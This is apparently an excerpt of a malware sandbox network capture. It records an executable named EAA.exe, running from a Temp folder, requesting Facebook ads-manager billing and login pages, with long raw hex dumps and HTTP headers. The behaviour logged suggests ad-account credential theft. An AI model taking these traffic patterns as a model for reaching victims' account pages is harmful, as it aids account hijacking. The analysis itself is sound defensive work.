                                                                                                                2022-10-13 11:07:35 UTC3696INData Raw: cc fd 8e e2 cd af 65 75 cc fd 8e e2 cd af 65 47 05 17 d8 48 31 eb 59 d5 9a 0f ed 2e a7 bd 04 30 d0 19 85 b5 78 f7 e5 f5 6d f5 c0 16 c7 0c 56 86 48 05 cd 0c 85 30 39 89 02 9a 0b 82 3d cf 47 9c b9 28 18 59 24 c2 75 5f 29 1b c4 24 88 3f 81 ba 2b aa c3 c9 19 c3 63 05 4b 88 d5 c1 72 02 b3 33 6e 6e bc d4 b7 80 08 26 97 e0 24 d1 48 41 2a 45 4a 22 94 a1 f7 67 e7 1c 0f 3a 93 e9 c6 1f 5c 55 38 52 ea be 33 8f 58 1a 31 65 fe 6d 9d ea 2f 84 a2 d9 03 70 87 9c a6 63 75 64 30 13 22 15 e0 ad cb 44 28 6a 73 80 20 ba c5 ae 65 9b b0 d0 03 4e f7 6d 86 db 44 69 d2 12 f8 d0 af 8e f6 23 6c 52 84 b7 37 8d e5 d5 63 56 70 79 f1 a9 6e 4f dc 02 a4 96 cb 22 57 0a b5 36 12 da 12 eb 9f 7f 21 12 e3 37 80 57 e0 00 11 b9 e9 82 f4 48 9a 41 93 b6 33 05 27 52 27 ac 86 0b 6d f1 61 dd 17 6c 2c
                                                                                                                Data Ascii: eueGH1Y.0xmVH09=G(Y$u_)$?+cKr3nn&$HA*EJ"g:\U8R3X1em/pcud0"D(js eNmDi#lR7cVpynO"W6!7WHA3'R'mal,
                                                                                                                2022-10-13 11:07:35 UTC3704INData Raw: 85 0d 1a 93 60 97 10 d3 d5 ae eb e4 67 cb 82 7b 55 80 9d 4e a2 18 17 77 38 2e 8f 0c 56 71 e9 2b 9c 1e 86 9a f6 ee 0c e2 aa 2d e8 fa 45 09 e3 aa a1 39 9b 91 92 23 40 95 d2 ab 30 9c 3d 8b bb 40 60 56 a8 fc cc 76 54 59 1b d0 88 01 54 c3 e9 2b 97 e1 8b 21 1e 93 cf d6 47 d2 ff 04 69 98 67 20 94 0a 44 42 0c 19 f2 8b 69 03 e9 e7 03 2e 37 56 7f 6a 43 2b 59 ec 55 8f 70 ef 5a d8 00 50 75 7b fd 18 b2 1f f2 5e 1e c6 33 7a 53 d8 77 26 81 78 8a d6 41 ec 07 d1 79 32 65 e8 e3 ad fe cb dc e8 f9 3a 1a 89 f0 fa 8f cf 18 5c 4d 78 fb f2 86 27 34 11 6b 52 34 4a 84 20 63 e3 65 aa 3a 98 7d 30 b0 2f f1 83 3a cd b4 bf 94 17 20 fc 4a f6 e6 9d 92 ef 34 e0 c7 af 09 e8 74 be fb 7c 05 72 bb 29 1c 9d 49 4b af 41 3c a0 f1 87 f7 8c b2 f6 58 c1 66 c8 d5 37 76 e0 dd 40 f9 ab fb e3 af ef e9
                                                                                                                Data Ascii: `g{UNw8.Vq+-E9#@0=@`VvTYT+!Gig DBi.7VjC+YUpZPu{^3zSw&xAy2e:\Mx'4kR4J ce:}0/: J4t|r)IKA<Xf7v@
                                                                                                                2022-10-13 11:07:35 UTC3711INData Raw: c0 c1 2d c9 9f 21 dc 59 7a 67 a7 ce 90 fc 09 3d 7d 73 6f 3b 01 3c ab 7a 42 dd 2b 2e 4c 8c 9e 11 23 0d d6 6c 2e f5 a7 e7 bb 69 19 70 04 7a 3b 62 e7 a7 45 fd 9d aa d1 6d 85 18 a1 a8 07 0c 73 b1 bc ed de 8d 90 74 70 0c 48 b8 99 43 c6 45 2c 9a ea 63 57 a4 36 3d 34 36 b9 70 1b 2d 82 43 d2 1e 6d d5 04 bf fb 5a bb 14 ac eb 53 ab ce f8 63 80 52 ad dd 05 eb 68 cd 7d 61 7c 43 e0 ae ad 56 e9 f2 d9 55 87 09 29 3b 85 26 4f c3 8d 13 28 d4 03 ff 7e ba f2 8c 53 da 21 15 88 32 62 15 d3 d1 85 c8 81 f7 1c ca 45 f8 f2 9f f9 99 89 49 6f 94 eb 90 6d ad ab 8c 24 01 95 f7 e7 a1 56 8b b0 28 e9 b8 8b 4f 91 92 a9 7a 0c 55 13 d4 dd 47 21 c3 26 43 2d c2 36 5b a6 04 78 b5 c0 e4 60 cf 1c 98 15 22 fb de b2 86 66 ba 03 3b eb c7 6c 1f 77 53 18 5d 02 a4 b6 d2 7a 51 24 fd 26 c1 81 2b b6 19
                                                                                                                Data Ascii: -!Yzg=}so;<zB+.L#l.ipz;bEmstpHCE,cW6=46p-CmZScRh}a|CVU);&O(~S!2bEIom$V(OzUG!&C-6[x`"f;lwS]zQ$&+
                                                                                                                2022-10-13 11:07:35 UTC3719INData Raw: c5 8c 31 37 74 6b 4a 6b f9 23 b4 06 f3 98 c1 4e 75 40 ca 99 98 7e cc 37 b3 88 37 0d a5 61 a8 03 48 b0 96 de a8 8e c9 2f bb 59 16 b1 ae 30 eb 99 b8 13 8b cb cb 82 1c 7b e3 c9 81 79 85 71 50 3d 91 6b e5 be 20 72 16 ef 49 dc 76 55 96 9b 56 60 02 32 42 a5 56 b7 7a c9 98 75 79 89 10 5e 6d e2 77 48 de 1a 84 9f 07 8f ec cb 9b 2e 6c 65 70 68 d9 46 9e 96 15 8b 07 1e 84 ed fb 97 d0 7e 1d ad de 22 74 e8 f0 cf 6a 68 8e 45 1a 8d bc 60 23 7a 82 9c b3 f4 b5 86 47 73 87 a0 86 00 0e 9e 1f 3a 05 24 ec 0d fd b4 d9 52 3b d5 30 ac 6c 75 a8 8d c2 2b f8 d5 a6 5f 54 93 dd 8b 00 c1 b8 a0 b7 1c 33 11 56 c7 ba 7d a4 f7 4b 79 e5 ad 8b 9d 8d d4 4a d6 18 d3 63 68 17 a0 c9 d2 b5 7f 0a ee c5 bf 14 84 0e 13 58 0e bf af a0 4b 1e 60 b7 d7 93 2f 4a f9 f1 89 eb 21 f3 5a dc 91 f0 a6 95 c4 ee
                                                                                                                Data Ascii: 17tkJk#Nu@~77aH/Y0{yqP=k rIvUV`2BVzuy^mwH.lephF~"tjhE`#zGs:$R;0lu+_T3V}KyJchXK`/J!Z
                                                                                                                2022-10-13 11:07:35 UTC3727INData Raw: 5d b2 dc 9d cc f1 76 78 4b 7d f9 53 e1 6d ac 51 78 73 49 f8 b7 a8 80 f7 1a 35 95 fe a8 d8 50 a4 e5 9f 40 81 e6 62 4d e6 c4 4e d0 22 47 51 3b 7a db 37 5d c3 81 ca e7 2f 14 3c 0f c7 ff ac 3d 75 8f d5 88 0a ab 0c f5 88 84 1c 78 3b 2d ed 58 75 dd ed 36 f9 37 44 08 62 3a 1f 67 e5 ce c6 94 c6 7c 2f 80 f2 bb 75 30 e3 25 fb 06 54 57 9b 32 b1 2f 4e aa 26 fc f2 10 1c bd 46 34 d8 32 d6 10 4c 65 5a 52 a8 8f 97 fe c3 70 bd 8c 80 dd 50 f1 e7 b2 73 ee 6c bf 62 5b f8 82 5b ee 29 4a fc a2 98 b2 00 27 3a dc 3c 50 ac 76 cd b6 0f 67 9e 41 16 89 c7 dd a0 85 3c c3 59 7a ea f2 e6 c6 cf 7a 56 fc 45 d0 fe c0 e4 e2 95 9f 37 5f 53 96 ec 7f 57 01 44 1c de 7f 2e ed f9 3b 52 13 be 71 16 85 bf cb f1 13 b2 1f e4 a7 41 96 a0 e9 b4 ec 09 7d 4c f7 56 43 a2 86 da 5f f1 f6 73 a4 01 d5 57 36
                                                                                                                Data Ascii: ]vxK}SmQxsI5P@bMN"GQ;z7]/<=ux;-Xu67Db:g|/u0%TW2/N&F42LeZRpPslb[[)J':<PvgA<YzzVE7_SWD.;RqA}LVC_sW6
                                                                                                                2022-10-13 11:07:35 UTC3735INData Raw: ad a9 10 b8 92 13 a8 c4 78 59 9b 50 28 6c e7 e3 36 4b 24 bb 2b 24 47 69 5a 2f 50 78 d9 33 1f 0f e5 9a 6e f5 97 78 26 f8 03 0a f4 88 67 33 c8 ea 0d c1 a3 6f 42 8b f1 d6 52 c8 67 a0 11 c5 9e ed de b6 26 40 55 c4 d8 5a de 39 ce 9a 60 83 ec 1f 40 6a b8 bf f9 24 4e 7c 55 b0 4a 20 ee 9d 3f e6 c8 f0 10 bd 37 12 e9 71 47 dd 90 8c cf 73 0e 9c 57 d4 ae df d0 38 60 0b 28 87 ee cd 8f b5 9e fd 20 f7 fa ac 44 65 a1 c1 de 59 26 c5 63 b8 77 e1 b7 93 fd 84 cd 77 f4 1f aa 74 1b d7 ec 11 46 0b b9 44 1e dc 63 3f 5a 60 59 19 f7 fb b6 eb 24 10 f6 16 e3 66 55 7f 95 9e 1a 34 28 78 1e 7a a4 29 43 4f 69 83 1d d6 01 d7 41 6f 43 36 0f 62 b2 2e 3c 99 23 12 d3 f9 ca da 26 a0 eb 99 ff d9 d3 cd e6 56 08 ce 00 4e 40 55 b5 f1 46 ac 64 bd 2a 86 37 5d fb 6c 31 a0 fb bf e8 4e 40 3d ff 9e af
                                                                                                                Data Ascii: xYP(l6K$+$GiZ/Px3nx&g3oBRg&@UZ9`@j$N|UJ ?7qGsW8`( DeY&cwwtFDc?Z`Y$fU4(xz)COiAoC6b.<#&VN@UFd*7]l1N@=
                                                                                                                2022-10-13 11:07:35 UTC3743INData Raw: 20 20 20 20 20 20 20 20 20 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 00 00 00 00 00 00 41 42 43 44 45 46 47
                                                                                                                Data Ascii: abcdefghijklmnopqrstuvwxyzABCDEFG
                                                                                                                2022-10-13 11:07:35 UTC3751INData Raw: c4 bb cf bb b8 b0 cd b6 bb bc cc b3 bb b1 d7 ab b0 c2 c6 a8 b7 b5 d1 c5 cc b7 d0 c7 cb c8 d0 96 94 95 d7 81 7b 80 d4 95 d6 ab 5b 8e cf b4 5a 99 cb b6 57 94 ca ae 54 95 cd b2 5b 96 c6 b1 4f 93 e0 d6 27 97 e2 e2 22 a2 dd d3 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 85 7f d9 9d 9c 90 d3 cc d7 c9 ce c3 cc ca cf c2 c0 c0 cf bd d3 bf dc c4 c2 cd cd c6 b5 ca dd c4 bd c0 d1 b2 c1 b9 d3 b8 bb ae ca b3 ba b1 c5 ab b8 b4 e3 b6 b6 b1 df ad c9 b8 c7 b1 c0 b7 d3 b9 b8 ba cc b5 c7 c2 d9 b4 be c8 cb ba bf bf cf b8 c5 c9 ce b5 c0 b0 d0 b0 b5 b8 cb b4 b5 bd d1 b7 c6 b7 da b1 b3 ae d3 b5 bd a6 c8 b0 c5 b1 cc af ba a7 d2 be b2 bb d2 b1 b9 b7 cb c1 ca ca d5 be c6 c5 cb 87 a1 9a cf 7e 81 7f cc 92 d8 bc 50 97 cd bc 3d a2 d9 c1 44 87 d1 bf 36 90 cc bf 39 8e d5 b3 2c
                                                                                                                Data Ascii: {[ZWT[O'" }~P=D69,
                                                                                                                2022-10-13 11:07:35 UTC3758INData Raw: 7f 83 d0 bb b2 c0 cd c6 c4 c0 cb b9 c7 ba d3 bb ca b7 d2 b7 bd bb d2 ad bb bb d2 b2 bf b8 d0 af bf bc d3 b8 c9 b5 cf af bb b5 d3 b1 be b4 cf b0 bd b2 d5 b3 bb bd cd b3 b7 b4 d2 b2 b7 b4 d2 ab af b3 ce b1 bc ad ca ab bb b3 d0 aa b8 b0 d0 b3 b9 b8 d0 c0 c9 d1 d9 84 8d 87 cd 96 b4 9f 74 9e c7 b5 37 aa c5 af 34 b7 b1 b7 39 ac ce a6 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 86 88 84 d3 b8 b7 bd d3 c5 d1 c1 d2 c3 c5 b9 d3 bc c1 bc d2 b0 c3 bb d5 b1 c3 b9 ce be c0 b5 d4 b1 bd b0 d0 b2 bd b4 ce ae c0 ae d5 b6 b2 ba d1 b8 c4 ba d5 be bf b7 d8 b2 b9 b3 d1 bc c5 af cf b4 bd bc cd b8 bc b3 cb b3 ba c1 cb b0 bf bb cc bc c7 ba d4 ca d2 c2 d4 8a 95 8d d6 9d b1 94 76 9e d7 b3 36 a7 d4 b2 33 a0 d5 a6 41 a0 d7 ad 29 9e d9 dc 14 9d d9 df 07 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii: t749!v63A)


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                10192.168.2.549745157.240.20.35443C:\Users\user\AppData\Local\Temp\EAA.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:08:17 UTC5660OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                Host: www.facebook.com
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                viewport-width: 1920
                                                                                                                sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                sec-ch-prefers-color-scheme: light
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                2022-10-13 11:08:17 UTC5661INHTTP/1.1 302 Found
                                                                                                                Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                x-fb-rlafr: 0
                                                                                                                document-policy: force-load-at-top
                                                                                                                cross-origin-resource-policy: same-origin
                                                                                                                cross-origin-opener-policy: same-origin-allow-popups
                                                                                                                Pragma: no-cache
                                                                                                                Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: DENY
                                                                                                                content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                2022-10-13 11:08:17 UTC5663INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                11192.168.2.549746157.240.20.35443C:\Users\user\AppData\Local\Temp\EAA.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:08:18 UTC5664OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                Host: www.facebook.com
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                viewport-width: 1920
                                                                                                                sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                sec-ch-prefers-color-scheme: light
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                2022-10-13 11:08:18 UTC5665INHTTP/1.1 200 OK
                                                                                                                Vary: Accept-Encoding
                                                                                                                report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                x-fb-rlafr: 0
                                                                                                                document-policy: force-load-at-top
                                                                                                                cross-origin-opener-policy: unsafe-none
                                                                                                                Pragma: no-cache
                                                                                                                Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: DENY
                                                                                                                content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                2022-10-13 11:08:18 UTC5666INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                2022-10-13 11:08:18 UTC5668INData Raw: 33 65 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22
                                                                                                                Data Ascii: 3eeb<!DOCTYPE html><html lang="en" id="facebook" class="
                                                                                                                2022-10-13 11:08:18 UTC5668INData Raw: 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 74 42 6b 4b 74 46 74 4f 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 3f 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 45 6e 76 22 5d 2c 62 29 3a 28 77 69 6e 64 6f
                                                                                                                Data Ascii: no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tBkKtFtO">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(windo
                                                                                                                2022-10-13 11:08:18 UTC5669INData Raw: 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 62 2f 72 2f 68 4c 52 4a 31 47 47 5f 79 30 4a 2e 69 63 6f 22 20 2f 3e 3c 6c 69
                                                                                                                Data Ascii: anager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><li
                                                                                                                2022-10-13 11:08:18 UTC5671INData Raw: 5a 6b 31 38 79 4e 49 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 59 6f 32 55 7a 4f 68 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 72 2f 56 5f 77 4a 38 45 51 75 2d 76 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 5a 38 4a 2b 78 50 34 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 74 42 6b 4b 74 46 74 4f 22 3e 3c 2f
                                                                                                                Data Ascii: Zk18yNI.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Yo2UzOh" crossorigin="anonymous" /><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/V_wJ8EQu-vo.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Z8J+xP4" crossorigin="anonymous" nonce="tBkKtFtO"></
                                                                                                                2022-10-13 11:08:18 UTC5672INData Raw: 58 33 37 6f 51 63 6f 36 44 77 68 55 54 38 77 22 7d 7d 2c 22 71 70 6c 44 61 74 61 22 3a 7b 22 37 37 35 38 22 3a 7b 22 72 22 3a 31 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 53 65 72 76 65 72 4a 53 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 54 69 6d 65 53 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 68 61 73 68 74 61 67 52 65 64 69 72 65 63 74 22 3a 74 72 75 65 2c 22 66 72 61 67 42 6c 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74
                                                                                                                Data Ascii: X37oQco6DwhUT8w"}},"qplData":{"7758":{"r":1}}})});requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){(new ServerJS()).handle({"define":[["URLFragmentPreludeConfig",[],{"hashtagRedirect":true,"fragBlacklist":["nonce","access_token","oaut
